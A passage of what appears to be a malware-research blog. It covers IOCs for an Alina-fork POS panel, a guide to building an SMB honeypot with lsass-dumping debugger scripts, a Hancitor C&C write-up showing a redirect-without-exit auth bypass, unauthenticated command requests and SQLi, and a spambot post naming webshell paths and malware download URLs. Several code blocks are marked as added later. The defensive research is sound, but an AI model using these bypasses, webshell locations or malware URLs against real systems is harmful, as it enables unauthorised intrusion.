<a href="https://i.imgur.com/oHk21I8.png"><img src="https://i.imgur.com/oHk21I8.png" height=100px;></a></br>
</br>
Some settings (look at Alina's 666 status code):</br>
<a href="https://i.imgur.com/ZiXA6Hv.png"><img src="https://i.imgur.com/ZiXA6Hv.png" height=310px;></a></br>
<a href="https://i.imgur.com/SEfAnT3.png"><img src="https://i.imgur.com/SEfAnT3.png" height=320px;></a></br>
You can also add some BINs to the panel database. Currently, they have 8472 BINs in the database.</br>
And finally the bot list (~600 bots if I trust the bot list).</br>
<a href="https://i.imgur.com/Pmci3QO.jpg"><img src="https://i.imgur.com/Pmci3QO.jpg" height=650px;></a></br>
I've uploaded the whole list of bots to <a href="https://imgur.com/a/9FUo5">this album</a>. Ping me if you're on the list :D I'm really curious to see the binary part.</br>
And finally, the database structure again reminds us of Alina:
<iframe src="https://pastebin.com/embed_iframe/rbAayP1D/noheader" style="border:none;width:100%"></iframe>
At this rate we will soon find more Alina forks than Zeus forks \o/</br>
</br>
So, NOPE! It's not a super new next-gen POS malware, it's just another Alina fork :D but the webinjects part looks curious :) and the team seems very active.</br>
But come on, 3k$ for open-sourced malware haha...
</br>
<iframe src="https://giphy.com/embed/Raf0YXvvFD2lG" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></br>
Thanks for your time, thanks to Xylitol and happy hunting :)
</br>
</br>
IOCs:</br></br>
<code>
http://thzsmrjqqzpaz2mz.onion.link/al/Spark.exe (Alina)
http://thzsmrjqqzpaz2mz.onion.link/payload.exe (Neutrino)
http://thzsmrjqqzpaz2mz.onion.link/at/files/us.exe (Atmos)
http://22klzn6kzjlwlmt2.onion.link/al/Spark.exe (Alina)
http://22klzn6kzjlwlmt2.onion.link/al/payload.exe (Neutrino)
http://22klzn6kzjlwlmt2.onion.link/al/files/us.exe (Atmos)
http://netco1000.ddns.net
http://netco400.ddns.net/Dia (Gorynch)
http://netco400.ddns.net/at/(Atmos)
e34720cc8ab3718413064f19af5cc704e95661e743293a19f218d3b675147525 (atmos)
26aa9709d0402157d9d36e4849b1f9bacecd8875169c7f26d7d40c5c0c3de298 (Alina)
8a62f61c4d11d83550ab4baceb9b18d980a4c590723f549f97661a32c1731aff (neutrino)
</code>
</br>
</br>
Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-14854394938478792662017-05-28T02:11:00.000-07:002017-05-29T10:49:30.513-07:00Feedback on how build SMB HoneypotHey,
</br></br>
During the painful "Wannacry weekend" I received a lot of messages asking for help to create an SMB honeypot.</br>
I'll try here to explain how I created mine.</br>
It's 2017 but it looks like it's still useful to remind people that honeypots are really useful.</br>
I read a lot of papers about Wannacry variants during the Wannacry crisis, but I never saw them in the wild. A lot of trolls uploaded patched versions of the worm to VirusTotal and waited for the first paper about a new variant....</br>
<center> <iframe src="https://giphy.com/embed/zagB8wzgm4Ce4" width="480" height="360" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
</br>
This post will not explain all the steps for building a honeypot, but it will try to give some tips and ideas.</br>
<h1>Exposing port 445</h1>
So, we need to create a honeypot to monitor SMB traffic and catch Wannacry in the most automated way possible.</br>
First of all, let's try to expose port 445. In many countries, it's really complicated to expose SMB over the Internet \o/!</br></br>
My first try was to install a Windows VM with a shared directory (Windows 7 x64, because it's a widely used OS in corporations, and hey, it's 2017, people use 64-bit OSes), and configure NAT rules on my home router:</br>
<pre>
+--------+          +----------+          +----------+
|Internet|---445--->|homerouter|---445--->|Windows VM|
+--------+          +----------+          +----------+
</pre>
I obviously disabled the Windows Firewall and Windows Defender, but when I tried to nmap port 445, the port was always filtered:
<pre>
Host is up.
PORT STATE SERVICE VERSION
445/tcp filtered microsoft-ds
</pre>
After some tests with Wireshark it appears that my home router allows incoming packets on port 445 but blocks the outgoing ones (the SYN/ACK never leaves, hence "filtered").</br>
I reproduced this behaviour with French ISPs (SFR, Numericable, Orange), the French hoster OVH, UK ISPs and some Digital Ocean VPSs.</br>
Because of this, we have to bypass these hard-coded firewall rules. It's really easy: we just have to carry the SMB traffic on a port other than 445. But for that we need 2 other machines: one to forward incoming SMB packets to another port, and one to forward them back to port 445 on the Windows VM:
<pre>
+--------+       +---+        +----------+        +---+       +----------+
|Internet|-445-->|VPS|-5555-->|homerouter|-5555-->|Rpi|-445-->|Windows VM|
+--------+       +---+        +----------+        +---+       +----------+
You need a few iptables rules (sorry in advance, I'm not an iptables Jedi \o/). One detail that bites: the FORWARD chain sees the packet <i>after</i> the PREROUTING DNAT, so it has to match the translated destination and port, and the replies must be let back through if your FORWARD policy is DROP. </br>
On the exposed VPS:</br>
<pre>
# everything arriving on 445 is sent to the home router on 5555
iptables -t nat -A PREROUTING -p tcp --dport 445 -j DNAT --to-destination HOME_ROUTER_IP:5555
# FORWARD sees the DNATed packet, i.e. dport 5555, not 445
iptables -A FORWARD -p tcp -d HOME_ROUTER_IP --dport 5555 -j ACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# rewrite the source so that the replies come back through this VPS
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
</pre>
and for the Raspberry Pi:
<pre>
# 5555 from the home router goes back to 445 on the Windows VM
iptables -t nat -A PREROUTING -p tcp --dport 5555 -j DNAT --to-destination WINDOWS_VM:445
iptables -A FORWARD -p tcp -d WINDOWS_VM --dport 445 -j ACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
</pre>
This way, port 445 of our Windows VM is ready to be pwned.</br>
To increase the pwning rate, I use many cheap VPSs around the world (I've used DigitalOcean, 1&1, HostAfrika...)</br>
<pre>
+--------+       +---+
|Internet|-445-->|VPS|-5555--+
+--------+       +---+       |
                 +---+       |
        ...-445->|VPS|-5555--+
                 +---+       |
                 +---+       |
        ...-445->|VPS|-5555--+
                 +---+       |
                 +---+       |
        ...-445->|VPS|-5555--+
                 +---+       |
                 +---+       |
        ...-445->|VPS|-5555--+
                 +---+       |
                 +---+       |
        ...-445->|VPS|-5555--+
                 +---+       |
                             v
                        +----------+        +---+       +----------+
                        |homerouter|-5555-->|Rpi|-445-->|Windows VM|
                        +----------+        +---+       +----------+
</pre>
The big limitation of this configuration is that once the packet reaches our Windows VM, the source IP is lost: the MASQUERADE rule on each hop rewrites it, so the VM only ever sees the Raspberry Pi.</br>
In my case I capture traffic on the VPSs (before the NAT, so the real source IP is still there) and retrieve the pcaps via <a href="http://www.kossboss.com/linuxtcpdump1">this trick </a> (thanks to <a href="https://twitter.com/kafeine">Kafeine</a> :D)</br>
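To get the attacker IPs back out of those VPS-side captures, here is an added example (not a script from the original post) that walks a classic pcap with the standard library only and lists every source that sent a SYN to port 445, with first-seen time and hit count. It assumes the pcap uses Ethernet framing and IPv4/TCP, and the sample capture it builds for itself is constructed, not real traffic:

```python
"""List the real source IPs hitting port 445 in a pcap captured on the VPS.

Added example, not from the original post. Assumes a classic pcap
(magic 0xa1b2c3d4, either byte order) with Ethernet + IPv4 + TCP frames;
anything else is skipped.
"""
import struct
import time
from collections import OrderedDict

SMB_PORT = 445


def iter_packets(pcap_bytes):
    """Yield (timestamp, frame) for every record in a classic pcap file."""
    magic = struct.unpack("<I", pcap_bytes[:4])[0]
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    off = 24  # skip the global header
    while off + 16 <= len(pcap_bytes):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(end + "IIII", pcap_bytes[off:off + 16])
        off += 16
        yield ts_sec + ts_usec / 1e6, pcap_bytes[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src_ip, dst_ip, sport, dport, flags) or None if not IPv4/TCP."""
    if len(frame) < 14 or frame[12:14] != b"\x08\x00":  # EtherType IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if len(ip) < ihl + 20 or ip[9] != 6:  # protocol 6 = TCP
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    sport, dport = struct.unpack("!HH", ip[ihl:ihl + 4])
    flags = ip[ihl + 13]
    return src, dst, sport, dport, flags


def smb_sources(pcap_bytes, port=SMB_PORT):
    """Map each IP that sent a bare SYN to `port` -> (first_seen, hit_count)."""
    seen = OrderedDict()
    for ts, frame in iter_packets(pcap_bytes):
        parsed = parse_tcp(frame)
        if parsed is None:
            continue
        src, _dst, _sport, dport, flags = parsed
        if dport != port or (flags & 0x12) != 0x02:  # SYN set, ACK clear
            continue
        first, count = seen.get(src, (ts, 0))
        seen[src] = (first, count + 1)
    return seen


def _syn_frame(src_ip, dst_ip, sport, dport, flags=0x02):
    """Constructed Ethernet/IPv4/TCP frame (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(int(x) for x in src_ip.split(".")),
                     bytes(int(x) for x in dst_ip.split(".")))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def sample_pcap():
    """Constructed capture: three SYNs to 445 (two from one IP), one to 80, one SYN/ACK."""
    frames = [
        (1494800000.0, _syn_frame("198.51.100.7", "203.0.113.10", 51000, 445)),
        (1494800001.5, _syn_frame("198.51.100.7", "203.0.113.10", 51001, 445)),
        (1494800002.0, _syn_frame("192.0.2.33", "203.0.113.10", 40000, 445)),
        (1494800003.0, _syn_frame("192.0.2.33", "203.0.113.10", 40001, 80)),
        (1494800004.0, _syn_frame("203.0.113.10", "192.0.2.33", 445, 40000, 0x12)),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # global header
    for ts, frame in frames:
        sec = int(ts)
        usec = int(round((ts - sec) * 1e6))
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_pcap()
    for ip, (first, count) in smb_sources(data).items():
        print(time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(first)), ip, count)
```

Run it with the pcap pulled from a VPS as the first argument; with no argument it parses its own constructed capture. Only bare SYNs count, so the SYN/ACKs the honeypot sends back through the same NAT are not mistaken for attackers.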
</br>
<h1>Monitoring the endpoint</h1>
Because there is a lot of malware other than Wannacry, it's important to monitor our Windows box.</br>
For that you have a lot of tools available; ProcMon is a good candidate: it's easy to run it and collect a trace automatically from the command line. For example, you can launch it and save a PML trace like this:
<pre>
pmon.exe /AcceptEula /Backingfile C:\pmon.pml
</pre>
To stop ProcMon, run:</br>
<pre>
pmon.exe /Terminate
</pre>
There are a lot of solutions for the behaviour part: you can use ETW traces, Event Viewer...
</br>The hardest part is to collect the files dropped into our honeypot.</br>
I think the best way is to use a <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/file-system-minifilter-drivers">minifilter</a>: you can intercept written PE files and save them to a specific location. <a href="https://github.com/Microsoft/Windows-driver-samples/tree/master/filesys/miniFilter/avscan">There is an almost ready-to-use example in the WDK.</a></br>
You can also hook the WriteFile API in userland, but that is easily bypassed. </br></br>
Just for fun, you can even retrieve written files and a lot of cool information without developing any tool, just with the very <strike>painful</strike> powerful debugger WinDbg \o/.</br>
The idea is to use WinDbg as a kernel debugger, break on each <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx">nt!NtWriteFile</a> call, and save the Buffer parameter :D. </br>
But you can do more! Dumping lsass memory on each attack, for example :) Oh, and yes, forget about perf here :D it's for fun</br>
You have 2 options: the native diabolical scripting language of WinDbg or the awesome Python interface <a href="https://pykd.codeplex.com/">pykd</a></br>
Here I'll use pykd :)</br>
Download <a href="http://virtualkd.sysprogs.org/download/">VirtualKD</a> and install it in the VM (copy the "target" directory and run vminstall)</br>
Run vmmon before restarting the VM; on the next boot WinDbg will pop up.</br>
<img src="https://i.imgur.com/e6mNfFK.png" height=350px></br>
</br>
Press F5 and let Windows boot. When Windows is ready, break into WinDbg (Ctrl+Pause).
</br>
Now we can do everything we want. For example, let's try to dump the memory of lsass (useful for fileless attacks :) ). By dumping lsass memory you can even easily extract the payload binary :).
</br>
</br>
For that, load the pykd extension into WinDbg via:
<pre>
.load pykd
</pre>
And write your Python script as you want.</br>
A dirty example here:
<iframe src="https://pastebin.com/embed_iframe/PkhsMtHp/noheader" style="border:none;width:100%"></iframe>
</br>
Finally, choose which action you want WinDbg to break on; here we'll dump lsass each time it tries to write a file:</br>
<pre>
bp nt!NtWriteFile "!py C:\smbhoneypot\dumper.py;g"
</pre>
Here we go, you are able to collect a memory dump of lsass each time it is exploited to drop something!</br>
</br>
From here you can extract just the <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff567121(v=vs.85).aspx">buffer</a> of NtWriteFile, you can break on the vulnerability itself and trace execution, etc. Plug in your brain and be creative! </br>
<img src="https://i.imgur.com/ouMh9PO.png" height=350px> </br>
It's quick to do, it's easy and it allows you to collect a lot of useful data.
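As an added example of the "extract just the buffer" idea (this is not the pastebin script from the post), here is a pykd script for the NtWriteFile breakpoint that saves every written buffer that looks like a PE file. It assumes an x64 guest, a Python 3 build of pykd, that the breakpoint sits on the first instruction of NtWriteFile (so [rsp] is the return address and stack arguments start at rsp+0x28), and an output directory at C:\smbhoneypot\dropped that you create beforehand. NtWriteFile's first four arguments travel in rcx, rdx, r8 and r9, so Buffer (6th) is at rsp+0x30 and Length (7th) at rsp+0x38. Wire it in with <code>bp nt!NtWriteFile "!py C:\smbhoneypot\nt_writefile_dump.py;g"</code>:

```python
"""Save PE-looking buffers at the nt!NtWriteFile breakpoint (pykd).

Added example, not the post's pastebin script. Assumptions (not stated in
the post): x64 guest; breakpoint on the first instruction of NtWriteFile,
so stack arguments begin at rsp+0x28; Python 3 pykd; pykd runs this file
as __main__; OUT_DIR already exists on the debugger host.
NtWriteFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock,
            Buffer, Length, ByteOffset, Key): Buffer is the 6th argument
(rsp+0x30), Length the 7th (rsp+0x38).
"""
import os
import time

try:
    import pykd  # only present inside WinDbg
except ImportError:
    pykd = None  # the pure helpers below still import and test elsewhere

OUT_DIR = r"C:\smbhoneypot\dropped"  # assumed output directory
MAX_SAVE = 16 * 1024 * 1024          # ignore absurd lengths from garbage calls


def write_file_args(read_ptr, read_u32, rsp):
    """Return (Buffer, Length) read through the injected memory readers."""
    return read_ptr(rsp + 0x30), read_u32(rsp + 0x38)


def looks_like_pe(data):
    """'MZ' at offset 0 and a sane e_lfanew (0x3C) pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def dump_name(process_name, pid, out_dir=OUT_DIR):
    """Output file: <process>_<pid>_<timestamp>.bin in out_dir."""
    stamp = time.strftime("%Y%m%d-%H%M%S")
    return os.path.join(out_dir, "%s_%d_%s.bin" % (process_name, pid, stamp))


def on_breakpoint():
    """Runs once per NtWriteFile hit; returns the saved path or None."""
    rsp = pykd.reg("rsp")
    buffer_va, length = write_file_args(pykd.ptrPtr, pykd.ptrDWord, rsp)
    if length < 0x40 or length > MAX_SAVE:
        return None
    try:
        data = bytes(pykd.loadBytes(buffer_va, length))
    except pykd.MemoryException:
        return None  # user buffer not mapped or paged out right now
    if not looks_like_pe(data):
        return None
    proc = pykd.typedVar("nt!_EPROCESS", pykd.getCurrentProcess())
    name = pykd.loadCStr(proc.ImageFileName.getAddress())
    pid = int(proc.UniqueProcessId)
    path = dump_name(name, pid)
    with open(path, "wb") as fh:
        fh.write(data)
    pykd.dprintln("[+] %s (pid %d) wrote a PE of %d bytes -> %s" % (name, pid, length, path))
    return path


if __name__ == "__main__" and pykd is not None:
    on_breakpoint()
```

The memory readers are passed in rather than called directly so the argument extraction can be checked outside WinDbg; inside the debugger they are simply pykd.ptrPtr and pykd.ptrDWord. Spawning the interpreter on every NtWriteFile in the system is slow, which is fine for a honeypot where, as said above, perf is not the point.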
<h1>Cleaning your honeypot</h1>
Another important point is manipulating the virtual machine. For that you have a lot of tools available. </br>
In my case, I use VMware on Windows. VMware has a useful tool called <a href="https://pastebin.com/3e9YyQn3">vmrun</a>; with it you can power on, power off, revert snapshots, retrieve files from the VM (like a pmon trace), run commands in the VM, list files... etc.</br>
Some command line examples:</br>
<pre>
create snapshot:
vmrun.exe -T ws snapshot c:\VMs\honeypot.vmx snapshot_name
revert snapshot:
vmrun.exe -T ws revertToSnapshot c:\VMs\honeypot.vmx snapshot_name
run program in guest (guest credentials go before the command):
vmrun.exe -T ws -gu windows_user -gp windows_pwd runProgramInGuest \
    c:\VMs\honeypot.vmx -activeWindow \
    -interactive -noWait program.exe
get data from guest:
vmrun.exe -T ws -gu windows_user -gp windows_pwd copyFileFromGuestToHost \
    c:\VMs\honeypot.vmx \
    c:\guest\auto_run.txt c:\host\auto_run.txt
</pre>
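Put together, the ProcMon commands above and these vmrun calls make one collection cycle: revert to a clean snapshot, start recording, leave port 445 exposed for a while, stop ProcMon, pull the trace out, kill the VM. Here is an added example (not from the post) that drives that cycle from the host. It assumes vmrun.exe is on PATH (or given in the VMRUN environment variable), a snapshot named "clean" taken while the VM was running with VMware Tools up, ProcMon copied into the guest at C:\tools\Procmon.exe, and the paths in the constants; all of those are assumptions:

```python
"""One honeypot collection cycle driven through vmrun (VMware Workstation).

Added example, not from the post. Assumed: vmrun.exe on PATH or in $VMRUN,
a running-state snapshot "clean" with VMware Tools up, Procmon at
C:\\tools\\Procmon.exe inside the guest, the guest credentials below.
"""
import os
import subprocess
import time

VMRUN = os.environ.get("VMRUN", "vmrun.exe")
VMX = r"c:\VMs\honeypot.vmx"                       # assumed
SNAPSHOT = "clean"                                  # assumed
GUEST_USER, GUEST_PASS = "windows_user", "windows_pwd"
PROCMON = r"C:\tools\Procmon.exe"                   # assumed
PML_IN_GUEST = r"C:\pmon.pml"
HOST_OUT = r"c:\honeypot\traces"                    # assumed
EXPOSE_SECONDS = 30 * 60                            # how long 445 stays open per cycle


def vmrun(op, *args, guest_auth=False):
    """Build one vmrun argv; guest operations need -gu/-gp before the command."""
    argv = [VMRUN, "-T", "ws"]
    if guest_auth:
        argv += ["-gu", GUEST_USER, "-gp", GUEST_PASS]
    return argv + [op, VMX] + list(args)


def cycle_commands(stamp):
    """Ordered commands for one revert -> trace -> collect -> stop cycle."""
    out_file = os.path.join(HOST_OUT, "pmon-%s.pml" % stamp)
    return [
        vmrun("revertToSnapshot", SNAPSHOT),
        vmrun("start", "nogui"),
        vmrun("runProgramInGuest", "-noWait", PROCMON, "/AcceptEula",
              "/Minimized", "/BackingFile", PML_IN_GUEST, guest_auth=True),
        vmrun("runProgramInGuest", PROCMON, "/Terminate", guest_auth=True),
        vmrun("copyFileFromGuestToHost", PML_IN_GUEST, out_file, guest_auth=True),
        vmrun("stop", "hard"),
    ]


def run_cycle(stamp=None, expose_seconds=EXPOSE_SECONDS):
    """Execute the cycle; the exposure wait sits between starting and stopping Procmon."""
    stamp = stamp or time.strftime("%Y%m%d-%H%M%S")
    cmds = cycle_commands(stamp)
    for i, argv in enumerate(cmds):
        subprocess.check_call(argv)
        if i == 2:  # Procmon is now recording: leave the honeypot exposed
            time.sleep(expose_seconds)
    return cmds[4][-1]  # host path of the collected trace


if __name__ == "__main__":
    while True:  # loop forever: every cycle starts from the clean snapshot
        print("collected", run_cycle())
```

The command list is built separately from its execution so the sequence can be inspected (or unit-tested) without a hypervisor; anything else you want per cycle, such as copying the lsass dumps out of the debugger host, slots in before the final stop.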
There are similar tools for every hypervisor.
<h1>PROFIT</h1>
Last point: don't forget to store all the data. Store everything you can, even if you don't know yet what to do with it.</br>
Dates, source IPs, memory dumps, samples, etc. This data is a gold mine.</br>
You can find a lot of Python libs for parsing pcaps, you can export WinDbg output, you can graph your pmon traces with tools like <a href="http://www.procdot.com/"> ProcDot</a>, forward your data to Kibana dashboards, etc.</br>
<h1>Conclusion</h1>
This kind of infrastructure costs me around 30€/month for VPSs + 30€ for a Raspberry Pi, so less than 500€ per year to have a look at what is happening in the wild, to have data, make stats, start some investigations, etc :) </br>
<center><iframe src="https://giphy.com/embed/yjI5G3pE3NH3O" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
This kind of project is awesome because you have to deal with network, system, a little bit of dev, databases, etc. You can even use this kind of honeypot to learn forensics, for example!</br>
I strongly recommend that everybody who wants to learn malware hunting builds honeypots, on many services and in different countries.</br>
Of course you cannot catch advanced attacks with a honeypot, but you can catch interesting malware with RDP or VNC honeypots, for example.</br>
<h1>Links</h1>
Some links that can help you:</br>
<a href="https://github.com/rabbitstack/fibratus">Tracing API call in Python: Fibratus</a></br>
<a href="https://medium.com/@vworri/extracting-the-payload-from-a-pcap-file-using-python-d938d7622d71">Example of how deal with pcap in Python</a></br>
<a href="http://cybercrime-tracker.net/tools/memdump.zip">memdump tools from CCT</a></br>
<a href="https://www.codeproject.com/Articles/43586/File-System-Filter-Driver-Tutorial">File System Filter Driver Tutorial</a></br>
<a href="https://theartofdev.com/windbg-cheat-sheet/">WinDbg cheat sheet</a></br>
<a href="http://www.vmware.com/pdf/vix160_vmrun_command.pdf">Using vmrun to Control Virtual Machines</a></br>
<a href="https://ruxcon.org.au/assets/2016/slides/ETW_16_RUXCON_NJR_no_notes.pdf">Make ETW Great Again. - Ruxcon 2016</a></br>
<a href="https://www.botconf.eu/wp-content/uploads/2015/12/OK-P04-Marc-Doudiet-Honey-Where-is-my-PoS.pdf">HONEY ? Where is my POS - Botconf</a></br>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-26419242992028538402017-03-16T00:17:00.000-07:002017-03-16T05:21:26.378-07:00Hancitor panel overviewHey! </br>
</br>
These past weeks I've read a lot of <a href="https://twitter.com/search?f=tweets&vertical=default&q=hancitor&src=typd">tweets</a> about Hancitor. Hancitor is even in the CheckPoint "top 5 Most Wanted malware" (¯\_(ツ)_/¯).</br>
You can read a lot of good stuff about the Hancitor/Fareit/Vawtrak/H1N1 gang (binary reversing, proxy infra...) but nothing about the Hancitor web panels. So, I've written this (very) quick blog post to show the attacker's point of view :]</br></br>
<center><img src="https://i.imgur.com/YoDDnRP.png" height=200px></center>
</br>
Since the admin activated whitelisting, it seems no longer possible to access the web panel via the Nginx proxy. When you try to access a page like admin.php or panel.php, the proxy returns a 403 error. To access the panel, you have to find the real IP behind the proxies.</br>
<script src="//pastebin.com/embed_js/aQ7RKKQ6/noheader"></script>
</br>
Before the whitelisting system, it was possible to access the Hancitor C&C thanks to a lot of vulns. Because these vulns are patched today, it's time to disclose some stuff. Let's have a look at this dropper's C&C.
</br>
<h2>Bypassing authentication</h2>
<center><a href="https://i.imgur.com/jtzqqR4.png"><img src="https://i.imgur.com/jtzqqR4.png" height=300px></a></center>
</br>
When you request a page, the panel developer checks whether the user is authenticated with this kind of code:</br>
<script src="//pastebin.com/embed_js/fnVw85Sz/noheader"></script>
This is an old-school kind of vulnerability \o/. They don't call "exit()" after the header() function, so the rest of the script keeps running after the Location header has been set.</br>
When you browse the page with a browser like Firefox, you are correctly redirected to google.com; however, if you grab the page with curl or wget, which don't follow the redirect by default, you get the 302 response together with everything the rest of the PHP code printed... that is, the whole panel page :). </br>
<center><img src="https://i.imgur.com/HtDaIxy.png" height=40px ></br></center>
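A quick way to test any panel for this pattern, as an added example (not code from the post or from the panel): fetch the page without following redirects and see whether the 3xx response still carries application content. The marker strings are assumptions about what a leaked panel page contains; adjust them to the target.

```python
"""Detect the header('Location: ...') without exit() pattern.

Added example, not from the post or the panel. A redirect response that
still carries application HTML means the script kept running after
header(); browsers hide this by following the redirect, so we fetch the
first response only. PANEL_MARKERS are assumed, tune them per target.
"""
import urllib.error
import urllib.request

PANEL_MARKERS = (b"<table", b"<form", b"commands.php", b"bots")


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib hand back the 3xx instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_no_follow(url, timeout=10):
    """Return (status, headers, body) of the first response, redirects untouched."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(url, timeout=timeout)
    except urllib.error.HTTPError as err:  # urllib raises on an unfollowed 3xx
        resp = err
    return resp.getcode(), dict(resp.headers), resp.read()


def redirect_leaks_content(status, body, markers=PANEL_MARKERS):
    """True when a 3xx response body still contains application content."""
    if not 300 <= status < 400:
        return False
    lowered = body.strip().lower()
    return bool(lowered) and any(m in lowered for m in markers)


def check(url):
    """Run the check against a live URL; missing_exit=True means vulnerable."""
    status, headers, body = fetch_no_follow(url)
    return {
        "status": status,
        "location": headers.get("Location"),
        "body_bytes": len(body),
        "missing_exit": redirect_leaks_content(status, body),
    }


if __name__ == "__main__":
    import sys
    print(check(sys.argv[1]))
```

The same thing by hand is <code>curl -s -i http://host/panel.php</code>: a 302 with a Location header followed by hundreds of bytes of HTML is the tell. The fix on the PHP side is a single exit() (or die()) right after header().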
</br>
Here we go; the panel is composed of 4 parts:</br>
<h3> Panel.php</h3>
<center><a href="https://i.imgur.com/jmiaXUr.png"><img src="https://i.imgur.com/l8vsccj.png" height=150px></a></center>
</br>
This is the main page, with some data about the infected hosts.</br>
<h3>commands.php</h3>
<center><a href="https://i.imgur.com/TfTcg8i.png"><img src="https://i.imgur.com/TfTcg8i.png" height=290px></a></center>
This page is used to send commands to the bots. You can send commands to a specific group of bots or to a specific location.</br>
The available commands are:</br>
<ul>
<li>Download and Run</li>
<li>BOT Start</li>
<li>DLL Load</li>
<li>EXE Load</li>
<li>Uninstall</li>
<li>Load Config</li>
<li>Update</li>
</ul>
Two interesting facts: there is an "uninstall" command, and if you send the correct POST request to commands.php without authentication, it works :)</br>
<h3>passwords.php</h3>
<center><a href="https://i.imgur.com/8SJzyY6.png"><img src="https://i.imgur.com/FEJoDvI.png" height=290px></a></center>
This page is used by the password stealer module. I've never seen this feature used. It's maybe due to the fact that this gang uses Fareit for stealing passwords...</br>
<h3>statistics.php</h3>
<center><a href="https://i.imgur.com/jGpLPNl.png"><img src="https://i.imgur.com/jGpLPNl.png" height=350px></a></center>
And finally the statistics page: you can see online / online in the last 12 hours / offline bots, and create a new group of bots.
</br>
Thanks to an SQLi, we can see that the database structure is:</br>
<script src="//pastebin.com/embed_js/hKYg1FVD/noheader"></script>
</br></br>
As you can see, this super evil malware has a very basic C&C.</br>
Some articles about this threat:</br>
<ul>
<li><a href="http://blog.airbuscybersecurity.com/post/2016/11/Analysing-the-Hancitor-Maldoc">Analysing the Hancitor Maldoc</a></li>
<li><a href="https://www.damballa.com/wp-content/uploads/2015/08/Damballa_PonyUp.pdf">PonyUp: Tracing Pony’s Threat Cycle and Multi-Stage Infection Chain</a></li>
<li><a href="https://isc.sans.edu/forums/diary/HancitorPonyVawtrak+malspam/21919">Hancitor/Pony/Vawtrak malspam</a></li>
</ul>
I hope this quick post can be useful to somebody</br>
</br>
<center><iframe src="//giphy.com/embed/9a9SgI0xItNmM" width="480" height="300" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-42908112205197463652017-02-27T15:09:00.000-08:002018-12-04T09:34:44.486-08:00Spambot safari #2 - Online Mail System
Hey ! </br>
today I'll present some research around a spambot named "Onliner". This spambot is currently used for <a href="https://benkowlab.blogspot.fr/2017/01/a-journey-inside-ursnif-campaign.html"> spreading Gozi</a>.</br>
I've already talked about Onliner in another blog post, but because the spambot evolves quickly, and the botmaster seems to <b>try</b> to avoid pwning attempts, I'll try to explain everything here :].</br></br>
<h2>Original sample</h2>
The <a href="http://vxvault.net/ViriFiche.php?ID=32824">first sample</a> that I grabbed came from email, dropped by JSDropper. </br>
A quick dynamic analysis allows us to understand that it's a spambot (a lot of SMTP connections from the malicious process). </br>Before reversing it, let's look at the C&C communication.</br>
<a href="https://i.imgur.com/KmZMRNU.png"><img src="https://i.imgur.com/KmZMRNU.png" height=210px></a></br>
The malware communicates over HTTP. An interesting thing is that the process doesn't contact the C&C directly; it contacts some proxy web pages (PHP scripts uploaded on compromised websites).</br>
</br>
<h2>Proxy - Good idea - Bad realization</h2>
Using proxy websites is a good idea only if you don't use poorly pwned CMSes. With poorly pwned CMSes, it takes anybody around 3 minutes to retrieve your real C&C. Example:</br>
I can make some suppositions:</br>
<ul>
<li>It's pretty certain that the botmaster uses a script to update all the proxy scripts</li>
<li>All the compromised websites are old: the most probable infection vectors are FTP brute force or CMS exploits</li>
<li>They have left a PHP backdoor somewhere on the compromised website</li>
</ul>
I tried to find the PHP backdoor in order to use it to read the PHP proxy code. After some guessing I saw that the PHP backdoor is a WSO webshell, always uploaded in the same locations:
<ul>
<li>/cgi-bin/terms.php</li>
<li>/cgi-bin/useterms.php</li>
<li>/css/terms.php</li>
<li>/css/useterms.php</li>
</ul>
The WSO webshell is protected by a poor password -> I can read the PHP proxy code :).
The commented version is below:</br>
<script src="//pastebin.com/embed_js/jDuu34L9/noheader"></script>
</br>
The real C&C is http://194.247.13.8/img/. I'll come back later to the $_GET['99'] / $_POST['99'] parameters; those parameters are really interesting in the pwning process :D.
</br>
<h2>Panel - Good idea - Bad realization</h2>
